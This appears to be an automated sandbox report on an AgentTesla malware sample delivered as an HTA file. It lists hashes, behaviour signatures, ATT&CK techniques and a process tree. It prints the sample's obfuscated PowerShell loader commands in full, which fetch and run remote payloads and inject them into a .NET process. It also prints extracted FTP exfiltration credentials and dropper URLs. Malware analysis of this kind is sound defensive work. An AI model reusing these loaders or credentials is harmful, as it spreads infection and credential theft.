agenttesla | fa54825b8b94917037cc1620eb21421f9bd31ac394f396c1fe80546e4ed88dfa

Analysis

max time kernel
144s
max time network
140s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
21-11-2024 08:56

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

fa54825b8b94917037cc1620eb21421f9bd31ac394f396c1fe80546e4ed88dfa.hta
Size

178KB
MD5

01928c833c9940a6896666a9d93b9670
SHA1

abe22dd055a6fa39c615cf72818e474f2525e7ae
SHA256

fa54825b8b94917037cc1620eb21421f9bd31ac394f396c1fe80546e4ed88dfa
SHA512

e34bc23996ab1ec12117e463f8b8ec5b4e880635d435286d3e4d09c8499c044dd2f92d8c2927e1435287691ae14dc1e1f7331c2aeae103ca9ac56022b9d883e0
SSDEEP

48:4vahW5oZz7eWLB2CCz7lRo7dmz7lOwo7dO81bBPW1zKfD299Ddaq6bWyxf9DZRDf:4vCl17nuYMiFeAqfoqyWyflRJm0cfQ

Score

10^/10

agenttesla defense_evasion discovery execution keylogger spyware stealer trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f

exe.dropper

https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f

Extracted

Family

agenttesla

Credentials

Protocol: ftp
Host:
ftp://ftp.elquijotebanquetes.com
Port:
21
Username:
[email protected]
Password:
4r@d15PS!-!h

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla
Agenttesla family
agenttesla
Blocklisted process makes network request 3 IoCs

Processes:

POWeRSHElL.EXepowershell.exe

flow pid process

17 1756 POWeRSHElL.EXe
22 452 powershell.exe
28 452 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exe

pid process

3180 powershell.exe
452 powershell.exe
Evasion via Device Credential Deployment 2 IoCs
defense_evasion execution

Processes:

POWeRSHElL.EXepowershell.exe

pid process

1756 POWeRSHElL.EXe
872 powershell.exe

flow	pid	process
17	1756	POWeRSHElL.EXe
22	452	powershell.exe
28	452	powershell.exe

pid	process
3180	powershell.exe
452	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WScript.exemshta.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	mshta.exe

Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

29 ip-api.com
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 452 set thread context of 4076 452 powershell.exe AddInProcess32.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

flow	ioc
29	ip-api.com

description	pid	process	target process
PID 452 set thread context of 4076	452	powershell.exe	AddInProcess32.exe

System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

mshta.exepowershell.exepowershell.exepowershell.exeAddInProcess32.exePOWeRSHElL.EXecsc.execvtres.exeWScript.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AddInProcess32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	POWeRSHElL.EXe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe

Suspicious behavior: EnumeratesProcesses 12 IoCs

Processes:

POWeRSHElL.EXepowershell.exepowershell.exepowershell.exe

pid	process
1756	POWeRSHElL.EXe
1756	POWeRSHElL.EXe
872	powershell.exe
872	powershell.exe
3180	powershell.exe
3180	powershell.exe
452	powershell.exe
452	powershell.exe
452	powershell.exe
452	powershell.exe
452	powershell.exe
452	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

POWeRSHElL.EXepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	1756	POWeRSHElL.EXe
Token: SeDebugPrivilege	872	powershell.exe
Token: SeDebugPrivilege	3180	powershell.exe
Token: SeDebugPrivilege	452	powershell.exe

Suspicious use of WriteProcessMemory 35 IoCs

Processes:

mshta.exePOWeRSHElL.EXecsc.exeWScript.exepowershell.exepowershell.exe

description	pid	process	target process
PID 2304 wrote to memory of 1756	2304	mshta.exe	POWeRSHElL.EXe
PID 2304 wrote to memory of 1756	2304	mshta.exe	POWeRSHElL.EXe
PID 2304 wrote to memory of 1756	2304	mshta.exe	POWeRSHElL.EXe
PID 1756 wrote to memory of 872	1756	POWeRSHElL.EXe	powershell.exe
PID 1756 wrote to memory of 872	1756	POWeRSHElL.EXe	powershell.exe
PID 1756 wrote to memory of 872	1756	POWeRSHElL.EXe	powershell.exe
PID 1756 wrote to memory of 3576	1756	POWeRSHElL.EXe	csc.exe
PID 1756 wrote to memory of 3576	1756	POWeRSHElL.EXe	csc.exe
PID 1756 wrote to memory of 3576	1756	POWeRSHElL.EXe	csc.exe
PID 3576 wrote to memory of 2368	3576	csc.exe	cvtres.exe
PID 3576 wrote to memory of 2368	3576	csc.exe	cvtres.exe
PID 3576 wrote to memory of 2368	3576	csc.exe	cvtres.exe
PID 1756 wrote to memory of 2268	1756	POWeRSHElL.EXe	WScript.exe
PID 1756 wrote to memory of 2268	1756	POWeRSHElL.EXe	WScript.exe
PID 1756 wrote to memory of 2268	1756	POWeRSHElL.EXe	WScript.exe
PID 2268 wrote to memory of 3180	2268	WScript.exe	powershell.exe
PID 2268 wrote to memory of 3180	2268	WScript.exe	powershell.exe
PID 2268 wrote to memory of 3180	2268	WScript.exe	powershell.exe
PID 3180 wrote to memory of 452	3180	powershell.exe	powershell.exe
PID 3180 wrote to memory of 452	3180	powershell.exe	powershell.exe
PID 3180 wrote to memory of 452	3180	powershell.exe	powershell.exe
PID 452 wrote to memory of 4944	452	powershell.exe	AddInProcess32.exe
PID 452 wrote to memory of 4944	452	powershell.exe	AddInProcess32.exe
PID 452 wrote to memory of 4944	452	powershell.exe	AddInProcess32.exe
PID 452 wrote to memory of 2456	452	powershell.exe	AddInProcess32.exe
PID 452 wrote to memory of 2456	452	powershell.exe	AddInProcess32.exe
PID 452 wrote to memory of 2456	452	powershell.exe	AddInProcess32.exe
PID 452 wrote to memory of 4076	452	powershell.exe	AddInProcess32.exe
PID 452 wrote to memory of 4076	452	powershell.exe	AddInProcess32.exe
PID 452 wrote to memory of 4076	452	powershell.exe	AddInProcess32.exe
PID 452 wrote to memory of 4076	452	powershell.exe	AddInProcess32.exe
PID 452 wrote to memory of 4076	452	powershell.exe	AddInProcess32.exe
PID 452 wrote to memory of 4076	452	powershell.exe	AddInProcess32.exe
PID 452 wrote to memory of 4076	452	powershell.exe	AddInProcess32.exe
PID 452 wrote to memory of 4076	452	powershell.exe	AddInProcess32.exe

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\fa54825b8b94917037cc1620eb21421f9bd31ac394f396c1fe80546e4ed88dfa.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2304
- C:\Windows\SysWOW64\WInDowspoWeRShelL\V1.0\POWeRSHElL.EXe
  "C:\Windows\sYSteM32\WInDowspoWeRShelL\V1.0\POWeRSHElL.EXe" "PoWERsHelL.Exe -EX bYPAsS -noP -W 1 -c DEvIceCrEdenTialdEPLoyment.Exe ; INVoKe-ExPReSSIOn($(InVOkE-exPReSSIon('[sYStEM.Text.ENcODInG]'+[CHAR]58+[CHar]58+'utf8.GETstRIng([sYstEM.CONVeRt]'+[ChAR]58+[chaR]58+'FROMBAsE64sTRING('+[CHaR]34+'JGsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtQmVyREVGaW5JVGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkQ2JwY2N4dVFRbSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJek1tLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFppdmRUcFYsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZVeUZIc2dOZSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrVU96SGNmbHp5KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZGZCIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIU2Jmb1ZwbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkazo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjIyLjEzL3hhbXBwL3NlL3NlZXRoZWJlc3R0aGluZ3NlbnRpcmV0aW1ld2l0aGdyZWF0dGhpbmdzd2l0aGxvdmVya2lzcy50SUYiLCIkRW5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGluZ3N3aXRobG92ZXJraXMudmJTIiwwLDApO1NUYVJ0LXNsZUVwKDMpO2lFeCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGluZ3N3aXRobG92ZXJraXMudmJTIg=='+[cHaR]0x22+'))')))"
  2⤵
  - Blocklisted process makes network request
  - Evasion via Device Credential Deployment
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1756
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYPAsS -noP -W 1 -c DEvIceCrEdenTialdEPLoyment.Exe
    3⤵
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:872
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\3z1se3eh\3z1se3eh.cmdline"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3576
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESEC63.tmp" "c:\Users\Admin\AppData\Local\Temp\3z1se3eh\CSCD3468D8949404D469381F367F9D9A2B5.TMP"
      4⤵
      System Location Discovery: System Language Discovery
      PID:2368
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seethebestthingsentiretimewithgreatthingswithloverkis.vbS"
    3⤵
    - Checks computer location settings
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2268
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdEcDNpbWFnZVVybCA9IEYxbWh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MicrJ0FhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmgnKydtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgRjFtO0RwM3dlJysnYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7RHAzaW1hZ2VCeXRlcyA9IERwM3dlYkNsaWVudCcrJy5Eb3cnKydubG9hZERhdGEoRHAzaW1hZycrJ2VVcicrJ2wpO0RwM2ltYWdlVGV4JysndCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKERwM2ltYWdlQnl0ZXMpO0RwM3N0YXJ0RmxhZyA9IEYxbTwnKyc8QkFTRTY0X1NUQVJUPj5GMW0nKyc7RHAzZW5kRmxhZyA9IEYxbTw8QkFTRTY0X0VORD4+RjFtO0RwM3N0YXJ0SScrJ25kZXggPSBEcDNpbWFnZVRleHQuSW5kZXhPZihEcDNzdGFydEZsYWcpO0RwM2VuZEluZGUnKyd4ID0gRHAzaW1hZ2VUZXh0LkluZGV4T2YoRHAzZW4nKydkJysnRmxhZyk7RHAzc3RhcnRJbmRleCAtJysnZ2UgMCAtYW5kIERwM2VuZEluZGV4IC1nJysndCBEcDNzdGFydEluZGV4O0RwM3N0YXJ0SW5kZXggKz0gRHAzc3RhcnQnKydGJysnbGFnLkxlbmd0aDtEcDNiYXNlNjRMZW5ndGggPSBEcDNlbmRJbmRleCAtIERwM3N0YXJ0SW5kZXg7RHAzYmFzJysnZTY0Q29tbWFuZCA9IERwM2ltYWdlVGV4dC5TdWJzdHJpbmcoRHAzc3RhcnRJbmRleCwgRHAzYmFzZTY0TGVuZ3RoKTtEcDNiYXNlNjRSZXZlcicrJ3NlZCA9IC1qb2luIChEcDNiYXNlNjRDb21tYW5kLlRvQ2gnKydhckFyJysncmF5KCkgNTl0IEZvckVhY2gtT2JqZWN0IHsgRHAzXyB9KVstMS4uLScrJyhEcDNiYXNlNjRDb21tYScrJ25kLkxlbmd0aCldO0RwM2NvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbicrJ2coJysnRHAzYicrJ2FzZTY0UmV2ZXJzZWQpO0RwM2xvYWQnKydlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZScrJ2N0aW9uLkFzc2VtYmx5XScrJzo6TG9hZChEcDNjb21tYW5kQnl0ZXMpO0RwM3ZhaU1ldGhvZCcrJyA9JysnIFtkJysnbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoRjFtVkFJRjFtKTtEcDN2YWlNZXRob2QuSW52bycrJ2tlKERwM251bGwsIEAoRjFtdHh0LkZSRkZSVy8yNTMvMzEuMjIuMy4yOTEvLzpwdHRoRjFtLCBGMW1kZXNhdGl2YWRvRjFtLCBGJysnMW1kZXNhdGl2YWRvRjFtLCBGMW1kZXNhdGl2YWRvRjFtLCBGMW1BZGRJblAnKydyb2Nlc3MzJysnMkYxbSwgRjFtZGVzYXRpdmFkb0YxbSwgRjFtZGVzYXRpdmFkb0YxbSxGMW1kZXNhdGl2YWRvRjFtLEYxbWRlc2F0aXZhZG9GMScrJ20sRjFtJysnZGVzYXRpdmFkb0YxbSxGMW1kZXNhdGl2YWRvRjFtLCcrJ0YxbWRlc2F0aXZhZG9GMW0sRjFtMUYxbSxGMW1kZXNhdGl2YWRvRjFtKSk7JykuUkVwbGFjZSgoW2NoYVJdNzArW2NoYVJdNDkrW2NoYVJdMTA5KSxbc1RSSU5nXVtjaGFSXTM5KS5SRXBsYWNlKChbY2hhUl02OCtbY2hhUl0xMTIrW2NoYVJdNTEpLCckJykuUkVwbGFjZSgoW2NoYVJdNTMrW2NoYVJdNTcrW2NoYVJdMTE2KSxbc1RSSU5nXVtjaGFSXTEyNCl8IC4oKEdldC1WQVJJYWJMRSAnKm1kcionKS5OYW1lWzMsMTEsMl0tSm9pTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:3180
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('Dp3imageUrl = F1mhttps://1017.filemail.com/api/file/get?filekey=2'+'Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f F1m;Dp3we'+'bClient = New-Object System.Net.WebClient;Dp3imageBytes = Dp3webClient'+'.Dow'+'nloadData(Dp3imag'+'eUr'+'l);Dp3imageTex'+'t = [System.Text.Encoding]::UTF8.GetString(Dp3imageBytes);Dp3startFlag = F1m<'+'<BASE64_START>>F1m'+';Dp3endFlag = F1m<<BASE64_END>>F1m;Dp3startI'+'ndex = Dp3imageText.IndexOf(Dp3startFlag);Dp3endInde'+'x = Dp3imageText.IndexOf(Dp3en'+'d'+'Flag);Dp3startIndex -'+'ge 0 -and Dp3endIndex -g'+'t Dp3startIndex;Dp3startIndex += Dp3start'+'F'+'lag.Length;Dp3base64Length = Dp3endIndex - Dp3startIndex;Dp3bas'+'e64Command = Dp3imageText.Substring(Dp3startIndex, Dp3base64Length);Dp3base64Rever'+'sed = -join (Dp3base64Command.ToCh'+'arAr'+'ray() 59t ForEach-Object { Dp3_ })[-1..-'+'(Dp3base64Comma'+'nd.Length)];Dp3commandBytes = [System.Convert]::FromBase64Strin'+'g('+'Dp3b'+'ase64Reversed);Dp3load'+'edAssembly = [System.Refle'+'ction.Assembly]'+'::Load(Dp3commandBytes);Dp3vaiMethod'+' ='+' [d'+'nlib.IO.Home].GetMethod(F1mVAIF1m);Dp3vaiMethod.Invo'+'ke(Dp3null, @(F1mtxt.FRFFRW/253/31.22.3.291//:ptthF1m, F1mdesativadoF1m, F'+'1mdesativadoF1m, F1mdesativadoF1m, F1mAddInP'+'rocess3'+'2F1m, F1mdesativadoF1m, F1mdesativadoF1m,F1mdesativadoF1m,F1mdesativadoF1'+'m,F1m'+'desativadoF1m,F1mdesativadoF1m,'+'F1mdesativadoF1m,F1m1F1m,F1mdesativadoF1m));').REplace(([chaR]70+[chaR]49+[chaR]109),[sTRINg][chaR]39).REplace(([chaR]68+[chaR]112+[chaR]51),'$').REplace(([chaR]53+[chaR]57+[chaR]116),[sTRINg][chaR]124)| .((Get-VARIabLE '*mdr*').Name[3,11,2]-JoiN'')"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:452
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
        6⤵
        
        PID:4944
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
        6⤵
        
        PID:2456
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:4076

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\POWeRSHElL.EXe.log

Filesize
2KB

MD5
968cb9309758126772781b83adb8a28f

SHA1
8da30e71accf186b2ba11da1797cf67f8f78b47c

SHA256
92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

SHA512
4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
12KB

MD5
6dd30dcb5b077830722c22d2159bc780

SHA1
10b4a3d7953d1b94282e11eb0f7412e1906154ee

SHA256
d7d04ccfeff64a0b141669261287028fef3db654f7d77d856d2acd8776135009

SHA512
18fa1e0becc97ba26e3f7e24279741c6a2000315cbf7bee308195119f58b3504bc9644014b4b007f14065da787565c1ddef5a4eed2860f9e10541f75a8ced1eb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
17KB

MD5
4b3be2352e1a4417bc7fceb53b00b6c6

SHA1
43532ad543de408a03f326010bef3fc605b7b0bc

SHA256
4f675146a33cd09f453b7be893b4818ee6f1fc0714e814f971276b19f853087b

SHA512
cce2e4ae22d9b83706953c3d0b12b1bf1a575791e2753a67050199185262b4629997b08b9f54613b26c4d44dbc178098b5a22bdea8b8112148f26284fcf2d684

Download Submit
C:\Users\Admin\AppData\Local\Temp\3z1se3eh\3z1se3eh.dll

Filesize
3KB

MD5
3040b8af77b8481b83cde998fe31c5a2

SHA1
2cf27d0656c834b92aa7faa5d63f729ca84e030b

SHA256
d84b67fdfb3862c40728ac89c00dde8841d983219b0385bda7804ede753abf35

SHA512
d52a8ad37f18602f806e4631410bd91a19c214f5b17e5f6944a4579e45811c9a1578b9fd35eee630bd1cc5827306096e238caf3d58fb0394aa5b46280b615d3a

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESEC63.tmp

Filesize
1KB

MD5
cd852cb178d87ce657213836386ff1aa

SHA1
6e8ae537df33ec03efcae18d8bfbbaec6680ef35

SHA256
d66735ba95f64d6a2a302b0403e5d3c69b807cb9f71d10b007bc439a724dc81b

SHA512
8da9497d8d7fc0b0d719787255b02a46d1499b8e14ee5658b9e96604194835a05ea11e15551c728d0556b5ee4377957aebe29ca6d9372848dd013a787d16d5f0

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_svzjxhil.vtj.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\seethebestthingsentiretimewithgreatthingswithloverkis.vbS

Filesize
138KB

MD5
2a43f3918d91622e9ccac7889f3e6dc2

SHA1
7d6131261e7f6a54291bd9e02eb7c985e093cfa7

SHA256
95f59c4235c1d4516b7d5de5a768f0f00c4a64c73a5be26fb26496ac5f378e9b

SHA512
422b39acb1dcacc05938ee122fa614a9a429e28a6a7f7ecf8a7f8416823b0e7ada11c28b7fe52ae1352d85fc99423ffdb16fd85ec2ac27f25a2f3adfed7b638c

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\3z1se3eh\3z1se3eh.0.cs

Filesize
485B

MD5
d24098e842acdc16d68eb9fc1eb0d97d

SHA1
a5ed59b81d7a78e4f619850c0d05f05984c282a7

SHA256
5a2115bb93abacd6e4cf9c0fc15f629c527fc13513305ffae22ba8872db0e309

SHA512
9a387056470cd7b1cadc638ca29227303a6c447eb551d219fbf0fb0e4c4265d9b9d40e3830088bb8eae3626ceb827de0ccb827c68b5d6a878ac1d1d17056d9ae

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\3z1se3eh\3z1se3eh.cmdline

Filesize
369B

MD5
9eba42bff894f17b4531e9a5eae9c4d3

SHA1
15714715fffa3cfda5c6d59d565afbbf178fcf19

SHA256
ed0452c2d5d53d2876a3050956dc826d6de43450f078a88c74cf300c716ef388

SHA512
52daeeb0f69a450f2669477da29afe2686e1e080211f0a2381432c8d99ad483ae264b9b7456b52a05199b388fff2953c534f01e0b82a15d296a93a76bf2cba60

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\3z1se3eh\CSCD3468D8949404D469381F367F9D9A2B5.TMP

Filesize
652B

MD5
e4e37cf038d2beda58cbb0fd1cc2b439

SHA1
e9485391b3ae3067c4522cdeb63cb4840e1b1541

SHA256
72d6fc72842621a6c53255cbcd0133e391c2d8c62b32c07253757f2981c8e8c6

SHA512
e3f3fca87b744bcd31dc870e3b362fe407ea466241cf0f3f648d4de954e4558590c4b76c2f20878625ca4a25ac5596f5e9dbe1a137d47fdfdae033d4c8f1ae27

Download Submit
memory/452-99-0x0000000007E40000-0x0000000007EDC000-memory.dmp

Filesize
624KB

Download
memory/452-98-0x0000000007CE0000-0x0000000007E38000-memory.dmp

Filesize
1.3MB

Download
memory/872-29-0x000000006E030000-0x000000006E07C000-memory.dmp

Filesize
304KB

Download
memory/872-39-0x0000000007390000-0x00000000073AE000-memory.dmp

Filesize
120KB

Download
memory/872-40-0x00000000073F0000-0x0000000007493000-memory.dmp

Filesize
652KB

Download
memory/872-41-0x0000000007B70000-0x00000000081EA000-memory.dmp

Filesize
6.5MB

Download
memory/872-42-0x0000000007530000-0x000000000754A000-memory.dmp

Filesize
104KB

Download
memory/872-43-0x0000000007590000-0x000000000759A000-memory.dmp

Filesize
40KB

Download
memory/872-44-0x00000000077C0000-0x0000000007856000-memory.dmp

Filesize
600KB

Download
memory/872-45-0x0000000007730000-0x0000000007741000-memory.dmp

Filesize
68KB

Download
memory/872-46-0x0000000007760000-0x000000000776E000-memory.dmp

Filesize
56KB

Download
memory/872-47-0x0000000007770000-0x0000000007784000-memory.dmp

Filesize
80KB

Download
memory/872-48-0x0000000007880000-0x000000000789A000-memory.dmp

Filesize
104KB

Download
memory/872-49-0x00000000077B0000-0x00000000077B8000-memory.dmp

Filesize
32KB

Download
memory/872-28-0x00000000073B0000-0x00000000073E2000-memory.dmp

Filesize
200KB

Download
memory/1756-18-0x00000000062C0000-0x000000000630C000-memory.dmp

Filesize
304KB

Download
memory/1756-4-0x0000000005250000-0x0000000005272000-memory.dmp

Filesize
136KB

Download
memory/1756-17-0x0000000006270000-0x000000000628E000-memory.dmp

Filesize
120KB

Download
memory/1756-16-0x0000000005C10000-0x0000000005F64000-memory.dmp

Filesize
3.3MB

Download
memory/1756-64-0x0000000006840000-0x0000000006848000-memory.dmp

Filesize
32KB

Download
memory/1756-70-0x000000007177E000-0x000000007177F000-memory.dmp

Filesize
4KB

Download
memory/1756-71-0x0000000071770000-0x0000000071F20000-memory.dmp

Filesize
7.7MB

Download
memory/1756-6-0x0000000005BA0000-0x0000000005C06000-memory.dmp

Filesize
408KB

Download
memory/1756-5-0x0000000005B30000-0x0000000005B96000-memory.dmp

Filesize
408KB

Download
memory/1756-0-0x000000007177E000-0x000000007177F000-memory.dmp

Filesize
4KB

Download
memory/1756-77-0x0000000071770000-0x0000000071F20000-memory.dmp

Filesize
7.7MB

Download
memory/1756-1-0x00000000028D0000-0x0000000002906000-memory.dmp

Filesize
216KB

Download
memory/1756-2-0x0000000071770000-0x0000000071F20000-memory.dmp

Filesize
